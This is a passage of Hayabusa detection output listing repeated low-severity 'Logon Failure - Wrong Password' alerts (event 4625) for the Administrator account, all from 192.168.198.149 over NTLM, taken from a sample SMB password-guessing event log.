+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: 
